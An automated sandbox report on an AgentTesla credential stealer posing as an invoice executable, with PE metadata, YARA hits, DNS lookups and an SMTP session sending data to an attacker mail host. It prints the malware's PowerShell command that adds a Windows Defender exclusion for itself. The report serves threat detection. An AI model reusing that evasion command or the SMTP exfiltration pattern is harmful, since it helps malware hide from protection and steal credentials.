SHA-256: 7898CB4A896ECC0DE4AE11A2EA2C6FFB2D58B8915DF5F4EEB0E201C99EBA05E0
SHA-512: FAF6BA6FD1176AC700178471477BE5023F1D83EF0DA6380DB4DA0BCA250EB6C14FE2F0AD37DBA5C7B009A4CCEAB8C47C477E6B4EB8F0B8A483515E5604071C13
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927171930..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe..Process ID: 6256..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927171930..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe..At line:1 char:64..+ ... -MpPreference -ExclusionPath C:\Users\user\Desktop\INVOICE & TELEX B .....+
C:\Windows\System32\drivers\etc\hosts
Process: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 11
Entropy (8bit): 2.663532754804255
Encrypted: false
SSDEEP: 3:iLE:iLE
MD5: B24D295C1F84ECBFB566103374FB91C5
SHA1: 6A750D3F8B45C240637332071D34B403FA1FF55A
SHA-256: 4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
SHA-512: 9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
Malicious: true
Preview: ..127.0.0.1

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.825862359561513
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: INVOICE & TELEX BL_PDF.exe
File size: 882688
MD5: 22a2657bb48e3303f6f0a0fd1fdfe441
SHA1: d6a230a732f3d691a7fce60081f30627ffabd33d
SHA256: 85627117b351e81655bb56b947b61a198d195a225db0e002ef476460b9f273ac
SHA512: 5e24b5f9c3886c9fdeaa968ccc59882b24a4c4cf8d90f4ae7d44ba4ed96bc91800d2f98c1eace2426a5dfe7a16f7c1233b1d54607d17ccba490d9e03514d569c
SSDEEP: 12288:X52s002Ce2nsnG3/TEbszQ4yejeIxJjtaTXOYVgqrmYBF0yI9STO3AbX8bwtxTse:zTIFMF+wGyVDidkAFjHoSa8F+2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.Qa..............0.................. ........@.. ....................................@................................

File Icon

Icon Hash: 138e8eccece8cccc

Static PE Info

General

Entrypoint: 0x4bfcf2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61511B66 [Mon Sep 27 01:16:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbfca0 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x19434 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xda000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbdcf8 | 0xbde00 | False | 0.68735727658 | data | 7.07881846434 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x19434 | 0x19600 | False | 0.391712207512 | data | 4.295708537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xda000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc0180 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0xd09b8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_ICON | 0xd4bf0 | 0x25a8 | data | |
RT_ICON | 0xd71a8 | 0x10a8 | data | |
RT_ICON | 0xd8260 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xd86d8 | 0x4c | data | |
RT_VERSION | 0xd8734 | 0x33c | data | |
RT_MANIFEST | 0xd8a80 | 0x9b0 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright F@Soft
Assembly Version | 1.0.6.2
InternalName | WindowsIdenti.exe
FileVersion | 1.0.6.0
CompanyName | F@Soft
LegalTrademarks |
Comments |
ProductName | Darwin AW
ProductVersion | 1.0.6.0
FileDescription | Darwin AW
OriginalFilename | WindowsIdenti.exe

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          09/27/21-17:21:14.492064TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49826587192.168.2.3208.91.199.225

                                                                                          Network Port Distribution

                                                                                          TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 17:21:12.930871010 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:13.075288057 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:13.075434923 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:13.618143082 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:13.618455887 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:13.762670994 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:13.762732983 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:13.763956070 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:13.905458927 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:13.909387112 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.053101063 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.053952932 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.197202921 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.197478056 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.348969936 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.349227905 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.490576982 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.492063999 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.492296934 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.493331909 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.493479967 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225
Sep 27, 2021 17:21:14.633482933 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.634147882 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.735589027 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3
Sep 27, 2021 17:21:14.788804054 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225

                                                                                          UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 17:19:39.082421064 CEST | 49572 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:19:39.098180056 CEST | 53 | 49572 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:01.070050955 CEST | 60823 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:01.147658110 CEST | 53 | 60823 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:01.766973019 CEST | 52130 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:01.837229013 CEST | 53 | 52130 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:02.261959076 CEST | 55102 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:02.288666964 CEST | 53 | 55102 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:02.368654966 CEST | 56236 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:02.442060947 CEST | 53 | 56236 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:02.896230936 CEST | 56527 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:02.910125017 CEST | 53 | 56527 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:03.391931057 CEST | 49559 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:03.405843019 CEST | 53 | 49559 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:03.825503111 CEST | 52650 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:03.839056969 CEST | 53 | 52650 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:04.583146095 CEST | 63297 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:04.669064999 CEST | 53 | 63297 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:05.300004005 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:05.320265055 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:05.368905067 CEST | 53615 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:05.383698940 CEST | 53 | 53615 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:06.204792023 CEST | 50728 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:06.218301058 CEST | 53 | 50728 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:06.359648943 CEST | 53777 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:06.373660088 CEST | 53 | 53777 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:06.632663965 CEST | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:06.645981073 CEST | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:06.889223099 CEST | 60352 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:06.919882059 CEST | 53 | 60352 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:10.101505995 CEST | 56773 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:10.114983082 CEST | 53 | 56773 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:12.115597963 CEST | 60982 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:12.129856110 CEST | 53 | 60982 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:17.413238049 CEST | 58058 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:17.426877022 CEST | 53 | 58058 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:26.217509985 CEST | 64367 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:26.244951010 CEST | 53 | 64367 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:35.353610039 CEST | 51539 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:35.366271019 CEST | 53 | 51539 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:42.631932974 CEST | 55393 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:42.645131111 CEST | 53 | 55393 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:43.374377012 CEST | 50585 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:43.387963057 CEST | 53 | 50585 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:20:53.888812065 CEST | 63456 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:20:53.918840885 CEST | 53 | 63456 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:21:09.864306927 CEST | 58540 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:21:09.866015911 CEST | 55108 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:21:09.898349047 CEST | 53 | 55108 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:21:09.899341106 CEST | 53 | 58540 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:21:12.167356968 CEST | 58942 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:21:12.321969032 CEST | 53 | 58942 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:21:12.817672014 CEST | 64432 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:21:12.831943035 CEST | 53 | 64432 | 8.8.8.8 | 192.168.2.3
Sep 27, 2021 17:21:20.407182932 CEST | 49250 | 53 | 192.168.2.3 | 8.8.8.8
Sep 27, 2021 17:21:20.419941902 CEST | 53 | 49250 | 8.8.8.8 | 192.168.2.3

                                                                                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 17:21:12.167356968 CEST | 192.168.2.3 | 8.8.8.8 | 0xb247 | Standard query (0) | smtp.zfftcn.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.817672014 CEST | 192.168.2.3 | 8.8.8.8 | 0xb6af | Standard query (0) | smtp.zfftcn.com | A (IP address) | IN (0x0001)

                                                                                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 17:21:12.321969032 CEST | 8.8.8.8 | 192.168.2.3 | 0xb247 | No error (0) | smtp.zfftcn.com | us2.smtp.mailhostbox.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:21:12.321969032 CEST | 8.8.8.8 | 192.168.2.3 | 0xb247 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.321969032 CEST | 8.8.8.8 | 192.168.2.3 | 0xb247 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.321969032 CEST | 8.8.8.8 | 192.168.2.3 | 0xb247 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.321969032 CEST | 8.8.8.8 | 192.168.2.3 | 0xb247 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.831943035 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6af | No error (0) | smtp.zfftcn.com | us2.smtp.mailhostbox.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:21:12.831943035 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6af | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.831943035 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6af | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.831943035 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6af | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:21:12.831943035 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6af | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)

                                                                                          SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 27, 2021 17:21:13.618143082 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Sep 27, 2021 17:21:13.618455887 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225 | EHLO 760639
Sep 27, 2021 17:21:13.762732983 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Sep 27, 2021 17:21:13.763956070 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225 | AUTH login c2xvdDJAemZmdGNuLmNvbQ==
Sep 27, 2021 17:21:13.905458927 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 334 UGFzc3dvcmQ6
Sep 27, 2021 17:21:14.053101063 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 235 2.7.0 Authentication successful
Sep 27, 2021 17:21:14.053952932 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225 | MAIL FROM:<slot2@zfftcn.com>
Sep 27, 2021 17:21:14.197202921 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 250 2.1.0 Ok
Sep 27, 2021 17:21:14.197478056 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225 | RCPT TO:<slot2@zfftcn.com>
Sep 27, 2021 17:21:14.348969936 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 250 2.1.5 Ok
Sep 27, 2021 17:21:14.349227905 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225 | DATA
Sep 27, 2021 17:21:14.490576982 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 354 End data with <CR><LF>.<CR><LF>
Sep 27, 2021 17:21:14.493479967 CEST | 49826 | 587 | 192.168.2.3 | 208.91.199.225 | .
Sep 27, 2021 17:21:14.735589027 CEST | 587 | 49826 | 208.91.199.225 | 192.168.2.3 | 250 2.0.0 Ok: queued as 44053D8E3C

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage


                                                                                          Memory Usage


                                                                                          High Level Behavior Distribution


                                                                                          Behavior


                                                                                          System Behavior

                                                                                          General

Start time: 17:19:19
Start date: 27/09/2021
Path: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
Imagebase: 0x2a0000
File size: 882688 bytes
MD5 hash: 22A2657BB48E3303F6F0A0FD1FDFE441
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.314615327.0000000002647000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                          General

Start time: 17:19:28
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
Imagebase: 0xae0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

                                                                                          General

Start time: 17:19:29
Start date: 27/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                          General

Start time: 17:19:29
Start date: 27/09/2021
Path: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
Imagebase: 0x420000
File size: 882688 bytes
MD5 hash: 22A2657BB48E3303F6F0A0FD1FDFE441
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                                          General

Start time: 17:19:31
Start date: 27/09/2021
Path: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
Imagebase: 0xcb0000
File size: 882688 bytes
MD5 hash: 22A2657BB48E3303F6F0A0FD1FDFE441
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                          Disassembly

                                                                                          Code Analysis


                                                                                            Executed Functions

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02469656
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: ccef59dd9dd53b9b7e053b2c9e631bbf87f43406b945b1433b3998402a445b26
                                                                                            • Instruction ID: 5531cc43be65cbf1c42d9eda0aab3e22c6a8d637ec4f3e361acff34483ebff3a
                                                                                            • Opcode Fuzzy Hash: ccef59dd9dd53b9b7e053b2c9e631bbf87f43406b945b1433b3998402a445b26
                                                                                            • Instruction Fuzzy Hash: 457102B0A00B058FDB24DF6AD4447AAB7F5BF88314F00892ED44AD7B50DB75E8498F92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0246FE8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 56eb8129d73d27380bd68ce6b43eaefd8b8e4671b6e4413b8cd11ffc71ded3ec
                                                                                            • Instruction ID: 6edaf5a3a998bef0fc77a74745aea32c73f039dca66297e6455d166dcb2497f7
                                                                                            • Opcode Fuzzy Hash: 56eb8129d73d27380bd68ce6b43eaefd8b8e4671b6e4413b8cd11ffc71ded3ec
                                                                                            • Instruction Fuzzy Hash: 1251B0B1D003099FDB14CFA9D884ADEBBB5BF48314F25852AE819AB210D774A885CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02465421
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 7ed4a8d7ee4e7fbe201cd924032efc2f8cd7219d1c393ca6143fe113530e64db
                                                                                            • Instruction ID: c73af146bc7828f6d7b5b3a4ddd49c9adb7d07fc904d46365a16828c203485ec
                                                                                            • Opcode Fuzzy Hash: 7ed4a8d7ee4e7fbe201cd924032efc2f8cd7219d1c393ca6143fe113530e64db
